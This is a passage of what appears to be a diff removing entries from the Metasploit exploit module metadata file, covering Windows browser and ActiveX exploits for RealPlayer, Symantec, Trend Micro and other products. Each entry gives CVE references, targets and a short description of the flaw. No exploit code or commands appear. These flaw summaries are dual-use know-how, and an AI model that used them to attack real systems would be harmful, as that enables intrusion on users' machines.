+0000", - "path": "/modules/exploits/windows/browser/real_arcade_installerdlg.rb", - "is_install_path": true, - "ref_name": "windows/browser/real_arcade_installerdlg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_cdda_uri": { - "name": "RealNetworks RealPlayer CDDA URI Initialization Vulnerability", - "fullname": "exploit/windows/browser/realplayer_cdda_uri", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-11-15", - "type": "exploit", - "author": [ - "bannedit ", - "sinn3r " - ], - "description": "This module exploits an initialization flaw within RealPlayer 11/11.1 and\n RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object\n initialization failure. However, this failure is improperly handled and\n uninitialized memory executed.", - "references": [ - "CVE-2010-3747", - "OSVDB-68673", - "BID-44144", - "ZDI-10-210", - "URL-http://service.real.com/realplayer/security/10152010_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RealPlayer SP 1.0 - 1.1.4 Universal", - "RealPlayer 11.0 - 11.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_cdda_uri.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_cdda_uri", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_console": { - "name": "RealPlayer rmoc3260.dll ActiveX Control Heap Corruption", - "fullname": "exploit/windows/browser/realplayer_console", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-08", - "type": "exploit", - "author": [ - "Elazar Broad " - ], - "description": "This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.\n By sending a specially crafted string to the 'Console' property\n in the rmoc3260.dll control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-1309", - "OSVDB-42946", - "BID-28157", - "URL-http://web.archive.org/web/20080313103656/http://secunia.com:80/advisories/29315/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/realplayer_console.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_console", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_import": { - "name": "RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow", - "fullname": "exploit/windows/browser/realplayer_import", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-10-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in RealOne Player V2 Gold Build 6.0.11.853 and\n RealPlayer 10.5 Build 6.0.12.1483. By sending an overly long string to the \"Import()\"\n method, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-5601", - "OSVDB-41430", - "BID-26130" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE / RealOne Player 2 (6.0.11.853)", - "IE / RealPlayer 10.5 (6.0.12.1483)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_import.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_import", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_qcp": { - "name": "RealNetworks Realplayer QCP Parsing Heap Overflow", - "fullname": "exploit/windows/browser/realplayer_qcp", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-08-16", - "type": "exploit", - "author": [ - "Sean de Regge", - "juan vazquez " - ], - "description": "This module exploits a heap overflow in Realplayer when handling a .QCP file.\n The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is\n allocated on the heap and user-supplied data from the file is copied within a\n memory copy loop.\n\n This allows a remote attacker to execute arbitrary code running in the context\n of the web browser via a .QCP file with a specially crafted \"fmt\" chunk.\n At this moment this module exploits the flaw on Windows XP IE6, IE7.", - "references": [ - "CVE-2011-2950", - "OSVDB-74549", - "BID-49172", - "ZDI-11-265", - "URL-http://service.real.com/realplayer/security/08162011_player/en/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_qcp.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_qcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/realplayer_smil": { - "name": "RealNetworks RealPlayer SMIL Buffer Overflow", - "fullname": "exploit/windows/browser/realplayer_smil", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-03-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.\n By creating a URL link to a malicious SMIL file, a remote attacker could\n overflow a buffer and execute arbitrary code.\n When using this module, be sure to set the URIPATH with an extension of '.smil'.\n This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8\n build 6.0.9.584.", - "references": [ - "CVE-2005-0455", - "OSVDB-14305", - "BID-12698" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "RealPlayer 10/8 on Windows 2000 SP0-SP4 English", - "RealPlayer 10/8 on Windows XP PRO SP0-SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/realplayer_smil.rb", - "is_install_path": true, - "ref_name": "windows/browser/realplayer_smil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/roxio_cineplayer": { - "name": "Roxio CinePlayer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/roxio_cineplayer", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-04-11", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a stack-based buffer overflow in SonicPlayer ActiveX\n control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.\n By setting an overly long value to 'DiskType', an attacker can overrun\n a buffer and execute arbitrary code.", - "references": [ - "CVE-2007-1559", - "OSVDB-34779", - "BID-23412" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/roxio_cineplayer.rb", - "is_install_path": true, - "ref_name": "windows/browser/roxio_cineplayer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/safari_xslt_output": { - "name": "Apple Safari Webkit libxslt Arbitrary File Creation", - "fullname": "exploit/windows/browser/safari_xslt_output", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-20", - "type": "exploit", - "author": [ - "Nicolas Gregoire" - ], - "description": "This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.", - "references": [ - "CVE-2011-1774", - "OSVDB-74017", - "URL-http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/safari_xslt_output.rb", - "is_install_path": true, - "ref_name": "windows/browser/safari_xslt_output", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/samsung_neti_wiewer_backuptoavi_bof": { - "name": "Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow", - "fullname": "exploit/windows/browser/samsung_neti_wiewer_backuptoavi_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the CNC_Ctrl.dll ActiveX control installed\n with the Samsung NET-i viewer 1.37.\n\n Specifically, when supplying a long string for the fname parameter to the\n BackupToAvi method, an integer overflow occurs, which leads to a posterior buffer\n overflow due to the use of memcpy with an incorrect size, resulting in remote code\n execution under the context of the user.", - "references": [ - "CVE-2012-4333", - "OSVDB-81453", - "BID-53193", - "URL-http://aluigi.altervista.org/adv/netiware_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/samsung_neti_wiewer_backuptoavi_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/samsung_security_manager_put": { - "name": "Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution", - "fullname": "exploit/windows/browser/samsung_security_manager_put", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-08-05", - "type": "exploit", - "author": [ - "mr_me " - ], - "description": "This is an exploit against Samsung Security Manager that bypasses the patch in ZDI-15-156 & ZDI-16-481\n by exploiting the vulnerability against the client-side. This exploit has been tested successfully using\n IE, FireFox and Chrome by abusing a GET request XSS to bypass CORS and reach the vulnerable PUT. Finally\n a traversal is used in the PUT request to upload the code just where we want it and gain RCE as SYSTEM.", - "references": [ - "URL-http://www.zerodayinitiative.com/advisories/ZDI-15-156/", - "URL-http://www.zerodayinitiative.com/advisories/ZDI-16-481/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Samsung Security Manager 1.32 & 1.4 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/samsung_security_manager_put.rb", - "is_install_path": true, - "ref_name": "windows/browser/samsung_security_manager_put", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/browser/sapgui_saveviewtosessionfile": { - "name": "SAP AG SAPgui EAI WebViewer3D Buffer Overflow", - "fullname": "exploit/windows/browser/sapgui_saveviewtosessionfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n with SAPgui. When passing an overly long string the SaveViewToSessionFile()\n method, arbitrary code may be executed.", - "references": [ - "CVE-2007-4475", - "OSVDB-53066", - "US-CERT-VU-985449" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb", - "is_install_path": true, - "ref_name": "windows/browser/sapgui_saveviewtosessionfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/siemens_solid_edge_selistctrlx": { - "name": "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/siemens_solid_edge_selistctrlx", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-26", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.\n The vulnerability exists on several APIs provided by the control, where user supplied input\n is handled as a memory pointer without proper validation, allowing an attacker to read and\n corrupt memory from the target process. This module abuses the methods NumChildren() and\n DeleteItem() in order to achieve memory info leak and remote code execution respectively.\n This module has been tested successfully on IE6-IE9 on Windows XP SP3 and Windows 7 SP1,\n using Solid Edge 10.4.", - "references": [ - "OSVDB-93696", - "EDB-25712" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb", - "is_install_path": true, - "ref_name": "windows/browser/siemens_solid_edge_selistctrlx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/softartisans_getdrivename": { - "name": "SoftArtisans XFile FileManager ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/softartisans_getdrivename", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-08-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n (SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-1682", - "OSVDB-47794", - "US-CERT-VU-914785", - "BID-30826" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/softartisans_getdrivename.rb", - "is_install_path": true, - "ref_name": "windows/browser/softartisans_getdrivename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/sonicwall_addrouteentry": { - "name": "SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/sonicwall_addrouteentry", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SonicWall SSL-VPN NetExtender.\n By sending an overly long string to the \"AddRouteEntry()\" method located\n in the NELaunchX.dll (1.0.0.26) Control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-5603", - "OSVDB-39069", - "URL-http://www.sec-consult.com/303.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IE 6 / Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/sonicwall_addrouteentry.rb", - "is_install_path": true, - "ref_name": "windows/browser/sonicwall_addrouteentry", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_altirisdeployment_downloadandinstall": { - "name": "Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute", - "fullname": "exploit/windows/browser/symantec_altirisdeployment_downloadandinstall", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to install and execute arbitrary files on a users file system via\n AeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.", - "references": [ - "BID-36346", - "CVE-2009-3028", - "OSVDB-57893" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_altirisdeployment_downloadandinstall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_altirisdeployment_runcmd": { - "name": "Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_altirisdeployment_runcmd", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Symantec Altiris Deployment Solution.\n When sending an overly long string to RunCmd() method of\n AeXNSConsoleUtilities.dll (6.0.0.1426) an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2009-3033", - "BID-37092", - "OSVDB-60496" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_altirisdeployment_runcmd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_appstream_unsafe": { - "name": "Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute", - "fullname": "exploit/windows/browser/symantec_appstream_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-01-15", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in Symantec AppStream Client 5.x. The vulnerability\n is in the LaunchObj ActiveX control (launcher.dll 5.1.0.82) containing the \"installAppMgr()\"\n method. The insecure method can be exploited to download and execute arbitrary files in the\n context of the currently logged-on user.", - "references": [ - "CVE-2008-4388", - "OSVDB-51410" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_appstream_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_appstream_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_backupexec_pvcalendar": { - "name": "Symantec BackupExec Calendar Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_backupexec_pvcalendar", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-02-28", - "type": "exploit", - "author": [ - "Elazar Broad " - ], - "description": "This module exploits a stack buffer overflow in Symantec BackupExec Calendar Control.\n By sending an overly long string to the \"_DOWText0\" property located\n in the pvcalendar.ocx control, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-6016", - "OSVDB-42358", - "BID-26904", - "URL-http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_backupexec_pvcalendar", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/symantec_consoleutilities_browseandsavefile": { - "name": "Symantec ConsoleUtilities ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/symantec_consoleutilities_browseandsavefile", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-02", - "type": "exploit", - "author": [ - "Nikolas Sotiriu (lofi)" - ], - "description": "This module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n By sending an overly long string to the \"BrowseAndSaveFile()\" method located\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n execute arbitrary code", - "references": [ - "CVE-2009-3031", - "OSVDB-59597", - "BID-36698", - "URL-http://sotiriu.de/adv/NSOADV-2009-001.txt", - "URL-http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English", - "Windows XP SP2 Universal", - "Windows XP SP2 Pro German", - "Windows XP SP3 Pro German" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb", - "is_install_path": true, - "ref_name": "windows/browser/symantec_consoleutilities_browseandsavefile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/synactis_connecttosynactis_bof": { - "name": "Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow", - "fullname": "exploit/windows/browser/synactis_connecttosynactis_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-05-30", - "type": "exploit", - "author": [ - "h1ch4m", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Synactis' PDF In-The-Box ActiveX\n component, specifically PDF_IN_1.ocx. When a long string of data is given\n to the ConnectToSynactis function, which is meant to be used for the ldCmdLine\n argument of a WinExec call, a strcpy routine can end up overwriting a TRegistry\n class pointer saved on the stack, resulting in arbitrary code execution under the\n context of the user.\n\n Also note that since the WinExec function is used to call the default browser,\n you must be aware that: 1) The default must be Internet Explorer, and 2) when the\n exploit runs, another browser will pop up.\n\n Synactis PDF In-The-Box is also used by other software such as Logic Print 2013,\n which is how the vulnerability was found and publicly disclosed.", - "references": [ - "OSVDB-93754", - "EDB-25835" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/synactis_connecttosynactis_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/systemrequirementslab_unsafe": { - "name": "Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method", - "fullname": "exploit/windows/browser/systemrequirementslab_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-10-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows attackers to execute code via an unsafe method in\n Husdawg, LLC. System Requirements Lab ActiveX Control (sysreqlab2.dll 2.30.0.0)", - "references": [ - "CVE-2008-4385", - "OSVDB-50122", - "US-CERT-VU-166651" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/systemrequirementslab_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/teechart_pro": { - "name": "TeeChart Professional ActiveX Control Trusted Integer Dereference", - "fullname": "exploit/windows/browser/teechart_pro", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-11", - "type": "exploit", - "author": [ - "mr_me ", - "sinn3r " - ], - "description": "This module exploits an integer overflow in TeeChart Pro ActiveX control. When\n sending an overly large/negative integer value to the AddSeries() property of\n TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the\n value and is later directly trusted and called upon.\n\n This module has been designed to bypass DEP only under IE8 with Java support. Multiple\n versions (including the latest version) are affected by this vulnerability that date\n back to as far as 2001.\n\n The following controls are vulnerable:\n\n TeeChart5.ocx Version 5.0.1.0 (clsid: B6C10489-FB89-11D4-93C9-006008A7EED4);\n TeeChart6.ocx Version 6.0.0.5 (clsid: 536600D3-70FE-4C50-92FB-640F6BFC49AD);\n TeeChart7.ocx Version 7.0.1.4 (clsid: FAB9B41C-87D6-474D-AB7E-F07D78F2422E);\n TeeChart8.ocx Version 8.0.0.8 (clsid: BDEB0088-66F9-4A55-ABD2-0BF8DEEC1196);\n TeeChart2010.ocx Version 2010.0.0.3 (clsid: FCB4B50A-E3F1-4174-BD18-54C3B3287258).\n\n The controls are deployed under several SCADA based systems including:\n\n Unitronics OPC server v1.3;\n BACnet Operator Workstation Version 1.0.76", - "references": [ - "OSVDB-74446", - "URL-http://www.stratsec.net/Research/Advisories/TeeChart-Professional-Integer-Overflow" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP0-SP3 (IE6/IE7)", - "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)", - "Windows 7 + JAVA + DEP bypass (IE8)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/teechart_pro.rb", - "is_install_path": true, - "ref_name": "windows/browser/teechart_pro", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/tom_sawyer_tsgetx71ex552": { - "name": "Tom Sawyer Software GET Extension Factory Remote Code Execution", - "fullname": "exploit/windows/browser/tom_sawyer_tsgetx71ex552", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-03", - "type": "exploit", - "author": [ - "Elazar Broad", - "rgod", - "juan vazquez " - ], - "description": "This module exploits a remote code execution vulnerability in the tsgetx71ex553.dll\n ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect\n initialization under Internet Explorer.\n\n While the Tom Sawyer GET Extension Factory is installed with some versions of VMware\n Infrastructure Client, this module has been tested only with the versions installed\n with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX\n control tested is tsgetx71ex553.dll, version 5.5.3.238.\n\n This module achieves DEP and ASLR bypass using the well known msvcr71.dll rop chain. The\n dll is installed by default with the Embarcadero software, and loaded by the targeted\n ActiveX.", - "references": [ - "CVE-2011-2217", - "OSVDB-73211", - "BID-48099", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 8 on Windows 7 SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb", - "is_install_path": true, - "ref_name": "windows/browser/tom_sawyer_tsgetx71ex552", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/trendmicro_extsetowner": { - "name": "Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution", - "fullname": "exploit/windows/browser/trendmicro_extsetowner", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-25", - "type": "exploit", - "author": [ - "Trancer " - ], - "description": "This module exploits a remote code execution vulnerability in Trend Micro\n Internet Security Pro 2010 ActiveX.\n When sending an invalid pointer to the extSetOwner() function of UfPBCtrl.dll\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-3189", - "OSVDB-67561", - "ZDI-10-165", - "EDB-14878" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/trendmicro_extsetowner.rb", - "is_install_path": true, - "ref_name": "windows/browser/trendmicro_extsetowner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/trendmicro_officescan": { - "name": "Trend Micro OfficeScan Client ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/trendmicro_officescan", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-02-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n Corporate Edition 7.3. By sending an overly long string to the\n \"CgiOnUpdate()\" method located in the OfficeScanSetupINI.dll Control,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-0325", - "OSVDB-33040", - "BID-22585" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/trendmicro_officescan.rb", - "is_install_path": true, - "ref_name": "windows/browser/trendmicro_officescan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": 